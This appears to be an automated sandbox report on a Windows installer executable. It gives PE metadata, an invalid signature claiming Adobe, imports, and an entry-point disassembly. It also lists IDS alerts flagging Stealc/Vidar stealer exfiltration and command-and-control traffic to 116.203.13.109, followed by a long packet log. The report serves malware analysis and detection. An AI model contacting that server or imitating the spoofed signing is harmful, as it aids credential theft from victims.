                                                                                                                                                                                                                                                              SSDEEP:24576:iE8W1Aw4BDEsIDdr7Bigm1Vm5Obojw0Z4FIRuYcT9:PZB4HmSgm1A5bx3RuYI
                                                                                                                                                                                                                                                              TLSH:28453391EFA0E9B6EEF70B33257AC1165CB51B2449E08D97130689C93E31B221A1D77F
                                                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L...X|.N.................n.......B...8.....
                                                                                                                                                                                                                                                              Icon Hash:000103061e346400
                                                                                                                                                                                                                                                              Entrypoint:0x403883
                                                                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                                                                              Digitally signed:true
                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                              Time Stamp:0x4E807C58 [Mon Sep 26 13:21:28 2011 UTC]
                                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                                              OS Version Major:5
                                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                                              File Version Major:5
                                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                                              Subsystem Version Major:5
                                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                                              Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                                                                                                                                                                                                              Signature Valid:false
                                                                                                                                                                                                                                                              Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                                                                              Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                              Error Number:-2146869232
                                                                                                                                                                                                                                                              Not Before, Not After
                                                                                                                                                                                                                                                              • 03/11/2023 00:00:00 04/11/2025 23:59:59
                                                                                                                                                                                                                                                              Subject Chain
                                                                                                                                                                                                                                                              • CN=Adobe Inc., OU=Acrobat DC, O=Adobe Inc., L=San Jose, S=ca, C=US, SERIALNUMBER=2748129, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US
                                                                                                                                                                                                                                                              Version:3
                                                                                                                                                                                                                                                              Thumbprint MD5:464C015DAA50884AB4DD5502E6B164B0
                                                                                                                                                                                                                                                              Thumbprint SHA-1:96B7B1EF175BBA4BDE33A05402134289B28B5BCB
                                                                                                                                                                                                                                                              Thumbprint SHA-256:ABC429325881B54BEC561B7B5A635E0E0AC9C94742F1324EBE5EB9AF6AE0CCC5
                                                                                                                                                                                                                                                              Serial:0D1A340F78D7D000E089FDBAAD6522DF
                                                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                                                              sub esp, 000002D4h
                                                                                                                                                                                                                                                              push ebx
                                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                                              push esi
                                                                                                                                                                                                                                                              push edi
                                                                                                                                                                                                                                                              push 00000020h
                                                                                                                                                                                                                                                              xor ebp, ebp
                                                                                                                                                                                                                                                              pop esi
                                                                                                                                                                                                                                                              mov dword ptr [esp+18h], ebp
                                                                                                                                                                                                                                                              mov dword ptr [esp+10h], 00409268h
                                                                                                                                                                                                                                                              mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                                                                              call dword ptr [00408030h]
                                                                                                                                                                                                                                                              push 00008001h
                                                                                                                                                                                                                                                              call dword ptr [004080B4h]
                                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                                              call dword ptr [004082C0h]
                                                                                                                                                                                                                                                              push 00000008h
                                                                                                                                                                                                                                                              mov dword ptr [00472EB8h], eax
                                                                                                                                                                                                                                                              call 00007F51311760DBh
                                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                                              push 000002B4h
                                                                                                                                                                                                                                                              mov dword ptr [00472DD0h], eax
                                                                                                                                                                                                                                                              lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                                              push 00409264h
                                                                                                                                                                                                                                                              call dword ptr [00408184h]
                                                                                                                                                                                                                                                              push 0040924Ch
                                                                                                                                                                                                                                                              push 0046ADC0h
                                                                                                                                                                                                                                                              call 00007F5131175DBDh
                                                                                                                                                                                                                                                              call dword ptr [004080B0h]
                                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                                              mov edi, 004C30A0h
                                                                                                                                                                                                                                                              push edi
                                                                                                                                                                                                                                                              call 00007F5131175DABh
                                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                                              call dword ptr [00408134h]
                                                                                                                                                                                                                                                              cmp word ptr [004C30A0h], 0022h
                                                                                                                                                                                                                                                              mov dword ptr [00472DD8h], eax
                                                                                                                                                                                                                                                              mov eax, edi
                                                                                                                                                                                                                                                              jne 00007F51311736AAh
                                                                                                                                                                                                                                                              push 00000022h
                                                                                                                                                                                                                                                              pop esi
                                                                                                                                                                                                                                                              mov eax, 004C30A2h
                                                                                                                                                                                                                                                              push esi
                                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                                              call 00007F5131175A81h
                                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                                              call dword ptr [00408260h]
                                                                                                                                                                                                                                                              mov esi, eax
                                                                                                                                                                                                                                                              mov dword ptr [esp+1Ch], esi
                                                                                                                                                                                                                                                              jmp 00007F5131173733h
                                                                                                                                                                                                                                                              push 00000020h
                                                                                                                                                                                                                                                              pop ebx
                                                                                                                                                                                                                                                              cmp ax, bx
                                                                                                                                                                                                                                                              jne 00007F51311736AAh
                                                                                                                                                                                                                                                              add esi, 02h
                                                                                                                                                                                                                                                              cmp word ptr [esi], bx
                                                                                                                                                                                                                                                              Programming Language:
                                                                                                                                                                                                                                                              • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                              • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                              • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                              • [RES] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                              • [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9b34 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf4000 | 0x1275e | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x123569 | 0x2998 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7a000 | 0x964 | .ndata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2d0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6dae | 0x6e00 | 00499a6f70259150109c809d6aa0e6ed | False | 0.6611150568181818 | data | 6.508529563136936 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x2a62 | 0x2c00 | 07990aaa54c3bc638bb87a87f3fb13e3 | False | 0.3526278409090909 | data | 4.390535020989255 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xb000 | 0x67ebc | 0x200 | 014871d9a00f0e0c8c2a7cd25606c453 | False | 0.203125 | data | 1.4308602597540492 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x73000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xf4000 | 0x1275e | 0x12800 | 3149e31166e44e11586d947b6dd166a0 | False | 0.8085541596283784 | data | 7.069380029797675 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x107000 | 0xf32 | 0x1000 | b04273a029f831b5b1f4cdc62eff7d92 | False | 0.599609375 | data | 5.5222298895083215 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xf4250 | 0xcda3 | PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced | English | United States | 0.9740326349182228
RT_ICON | 0x100ff4 | 0x11ac | PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced | English | United States | 0.9964633068081344
RT_ICON | 0x1021a0 | 0x88e | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0050228310502283
RT_ICON | 0x102a30 | 0x2668 | Device independent bitmap graphic, 48 x 96 x 32, image size 9792 | English | United States | 0.13578112286411717
RT_ICON | 0x105098 | 0x1128 | Device independent bitmap graphic, 32 x 64 x 32, image size 4352 | English | United States | 0.17304189435336975
RT_DIALOG | 0x1061c0 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x1062c0 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x1063dc | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x10643c | 0x4c | data | English | United States | 0.8026315789473685
RT_MANIFEST | 0x106488 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193
DLL | Import
KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-31T21:40:09.232471+0100 | 2859378 | ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 | 1 | 192.168.2.4 | 49739 | 116.203.13.109 | 443 | TCP
2024-12-31T21:40:11.953332+0100 | 2044247 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config | 1 | 116.203.13.109 | 443 | 192.168.2.4 | 49741 | TCP
2024-12-31T21:40:13.382414+0100 | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 | 1 | 192.168.2.4 | 49742 | 116.203.13.109 | 443 | TCP
2024-12-31T21:40:13.382548+0100 | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | 1 | 116.203.13.109 | 443 | 192.168.2.4 | 49742 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:11.300239086 CET49741443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:11.300259113 CET44349741116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:11.311258078 CET49741443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:11.311270952 CET44349741116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:11.953077078 CET44349741116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:11.953102112 CET44349741116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:11.953172922 CET44349741116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:11.953171968 CET49741443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:11.953233004 CET49741443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:11.953233004 CET49741443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:11.953690052 CET49741443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:11.953725100 CET44349741116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:11.955444098 CET49742443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:11.955482006 CET44349742116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:11.955564022 CET49742443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:11.955756903 CET49742443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:11.955773115 CET44349742116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:12.680627108 CET44349742116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:12.684536934 CET49742443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:12.685141087 CET49742443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:12.685148954 CET44349742116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:12.686984062 CET49742443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:12.686989069 CET44349742116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:13.382426023 CET44349742116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:13.382474899 CET44349742116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:13.382507086 CET49742443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:13.382534027 CET49742443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:13.382776976 CET49742443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:13.382791996 CET44349742116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:13.397068024 CET49743443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:13.397157907 CET44349743116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:13.397260904 CET49743443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:13.397489071 CET49743443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:13.397521973 CET44349743116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:14.041193962 CET44349743116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:14.041296005 CET49743443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:14.042118073 CET49743443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:14.042136908 CET44349743116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:14.058227062 CET49743443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:14.058240891 CET44349743116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:14.058288097 CET49743443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:14.058307886 CET44349743116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:14.430605888 CET49744443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:14.430655956 CET44349744116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:14.430721045 CET49744443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:14.430939913 CET49744443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:14.430953026 CET44349744116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:14.725614071 CET44349743116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:14.725675106 CET44349743116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:14.725688934 CET49743443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:14.725739002 CET49743443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:14.726541042 CET49743443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:14.726576090 CET44349743116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:15.071019888 CET44349744116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:15.071156979 CET49744443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:15.072952032 CET49744443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:15.072962999 CET44349744116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:15.075247049 CET49744443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:15.075252056 CET44349744116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:15.918056011 CET44349744116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:15.918118954 CET44349744116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:15.918126106 CET49744443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:15.918169975 CET49744443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:15.919176102 CET49744443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:15.919192076 CET44349744116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:17.990379095 CET49750443192.168.2.4172.217.16.132
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:17.990437984 CET44349750172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:17.990502119 CET49750443192.168.2.4172.217.16.132
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:17.990679979 CET49750443192.168.2.4172.217.16.132
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:17.990709066 CET44349750172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:18.555876970 CET49751443192.168.2.4172.217.16.132
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:18.555916071 CET44349751172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:18.556214094 CET49751443192.168.2.4172.217.16.132
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:18.556214094 CET49751443192.168.2.4172.217.16.132
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:18.556243896 CET44349751172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:18.607300043 CET49752443192.168.2.4172.217.16.132
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:18.607338905 CET44349752172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:18.608496904 CET49752443192.168.2.4172.217.16.132
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:18.608722925 CET49752443192.168.2.4172.217.16.132
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:18.608736992 CET44349752172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:18.642028093 CET44349750172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:18.643657923 CET49750443192.168.2.4172.217.16.132
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:18.643680096 CET44349750172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:18.644737959 CET44349750172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:18.644851923 CET49750443192.168.2.4172.217.16.132
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:18.679939032 CET49750443192.168.2.4172.217.16.132
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.221491098 CET44349751172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.227582932 CET44349751172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.227657080 CET49751443192.168.2.4172.217.16.132
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.227663040 CET44349751172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.233778954 CET44349751172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.236535072 CET49751443192.168.2.4172.217.16.132
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.236541033 CET44349751172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.240108967 CET44349751172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.240533113 CET49751443192.168.2.4172.217.16.132
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.240539074 CET44349751172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.244980097 CET44349751172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.246151924 CET49751443192.168.2.4172.217.16.132
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.246157885 CET44349751172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.250720978 CET44349751172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.252355099 CET49751443192.168.2.4172.217.16.132
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.252362967 CET44349751172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.255810022 CET44349751172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.255853891 CET49751443192.168.2.4172.217.16.132
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.255858898 CET44349751172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.261276960 CET44349751172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.261332035 CET49751443192.168.2.4172.217.16.132
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.261337996 CET44349751172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.281588078 CET44349751172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.281618118 CET44349751172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.281647921 CET44349751172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.281650066 CET49751443192.168.2.4172.217.16.132
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.281657934 CET44349751172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.281698942 CET49751443192.168.2.4172.217.16.132
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.284486055 CET44349751172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.284533024 CET49751443192.168.2.4172.217.16.132
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.284538031 CET44349751172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.284567118 CET44349751172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.284799099 CET49751443192.168.2.4172.217.16.132
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.284804106 CET44349751172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.289031029 CET44349751172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.289083958 CET49751443192.168.2.4172.217.16.132
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.289089918 CET44349751172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.293225050 CET44349751172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.293252945 CET44349751172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.293279886 CET49751443192.168.2.4172.217.16.132
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.293287992 CET44349751172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.293329000 CET49751443192.168.2.4172.217.16.132
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.295021057 CET44349751172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.297610044 CET44349751172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.297637939 CET44349751172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.297676086 CET49751443192.168.2.4172.217.16.132
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.297683001 CET44349751172.217.16.132192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.297724009 CET49751443192.168.2.4172.217.16.132
